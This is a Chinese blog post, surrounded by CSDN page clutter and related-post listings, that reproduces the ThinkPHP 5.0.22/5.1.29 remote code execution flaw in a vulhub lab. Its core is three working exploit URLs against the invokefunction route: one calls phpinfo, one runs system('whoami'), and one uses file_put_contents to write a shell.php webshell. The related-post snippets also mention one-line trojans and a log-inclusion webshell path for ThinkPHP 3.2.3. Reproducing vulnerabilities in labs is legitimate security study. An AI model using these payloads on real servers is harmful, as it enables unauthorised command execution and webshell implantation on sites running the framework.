ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

最新推荐文章于 2024-06-24 00:29:14 发布

shadow_pedestrian

最新推荐文章于 2024-06-24 00:29:14 发布

阅读量3.7k

点赞数

CC 4.0 BY-SA版权

分类专栏：网安文章标签： thinkphp

本文链接：https://blog.youkuaiyun.com/qq_38807738/article/details/86777608

网安专栏收录该内容

4 篇文章

订阅专栏

本文详细介绍ThinkPHP 5.0.22版本中远程代码执行(RCE)漏洞的复现步骤，包括利用payload进行漏洞验证及文件写入操作，适合安全研究人员和开发者学习。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

复现环境

thinkphp5.0.22

推荐使用vulhub快速搭建漏洞环境

漏洞payload：

1：/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

2：index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

效果如下

写入文件的payload：

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码

更详细可参考博文：

https://blog.youkuaiyun.com/qq_29647709/article/details/84956221

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

shadow_pedestrian

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_45653478的博客

04-27

1366

ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中，由于框架错误地处理了控制器名称，如果网站未启用强制路由（默认），它可以执行任何方法，从而导致 RCE 漏洞。

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_67813445的博客

03-15

798

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

七天

07-14

1501

文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码一、漏洞简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本支持，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展，ThinkPHP框架本身没有什么特别模块要求，具体的应用系统运行环境要求视开发所涉及的模块。由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由的情况下可以执行任意方法，从而导致远程命令执行漏洞。受影响的版

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

不曾扬帆，何以至远方

07-17

2036

Thinkphp 5 远程代码执行漏洞

thinkPHP5.0.22

12-06

ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。遵循Apache2开源许可协议发布，意味着你可以免费使用ThinkPHP，甚至允许把你基于ThinkPHP开发的应用开源或商业产品发布/销售。

Thinkphp 5.0.22

11-19

这是tp5.0框架资源。。

记录一次vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

sszsNo1的博客

06-29

305

vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接（复现详细过程）

m0_52701599的博客

03-19

3351

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

qq_53409748的博客

03-16

377

vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

阿里云报告：ThinkPHP5远程代码执行高危漏洞

DanyYan的博客

12-12

1596

阿里云报个漏洞需要修复，验证后还给出了URL地址，需要修复一下，可利用下面的代码在执行模块解析时把它抛个错误。 if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller);} 我的thi...

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

ThinkPHP 5.0 远程代码执行漏洞分析

ThinkPHP 开发框架核心版 v5.0.22

10-07

ThinkPHP是一个开源的，快速、简单的面向对象的轻量级PHP开发框架，遵循Apache2开源协议发布，是为了敏捷WEB应用开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性，

thinkphp 一键漏洞检测

12-09

thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

城南以南花亦开

09-16

527

在 ThinkPHP 版本 5 中由于框架没有对控制器名进行正确检测处理从而导致的远程命令执行漏洞。

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现

weixin_52685785的博客

03-15

411

用HackBar 插件向其发送请求，查看是否存在远程执行漏洞。进入vulhub中漏洞环境的目录，启动环境。将一句话木马进行base64加密并进行上传。出现报错，进入需要修改的文档。访问shell.php。

thinkphp系列vulhub所有漏洞复现ThinkPHP 2.x 任意代码执行漏洞，ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

qq_47289634的博客

07-06

441

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

Python武器库开发-武器库篇之Thinkphp5-5.0.22/5.1.29远程执行代码漏洞（六十五）

06-24

1392

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装，我们进入 ThinkPHP漏洞环境，可以 cd ThinkPHP，然后通过 ls 查看可以搭建的靶场，目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。

ThinkPHP 3.2.3 RCE漏洞

归零者的博客

11-25

3447

用蚁剑连接地址：index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log，密码为：8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控，可导致模板文件路径变量被覆盖为携带攻击代码的文件路径，导致任意文件包含，可执行任意代码。,burp 抓包，将路径改为。日志文件中包含执行代码。

【安全漏洞】ThinkPHP 3.2.3 漏洞复现

2201_75857869的博客

03-03

2341

函数时没有参数传入，而我们找到的是有参数的，PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错，所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中，连带着我们输入的可控的php代码也在其中，然后包含了该文件，所以造成了命令执行。处，除了exp外，还有一处bind，这里同样也是用点拼接字符串，但是不同的是这里还拼接了一个冒号。，所以进入第二个分支，将我们的输入转化为十进制，恶意语句就被过滤了，后面就是正常的SQL语句了。最开始的字符传入的是0，才能去除掉冒号。

ThinkPHP5远程代码执行漏洞修复方法

在ThinkPHP 5框架中发现的特定远程代码执行漏洞，主要是由于框架在处理路由时存在不当的配置或编码实现，导致未经正确过滤的用户输入被错误地处理，从而允许攻击者构造恶意请求，执行服务器端代码。由于这一漏洞可能...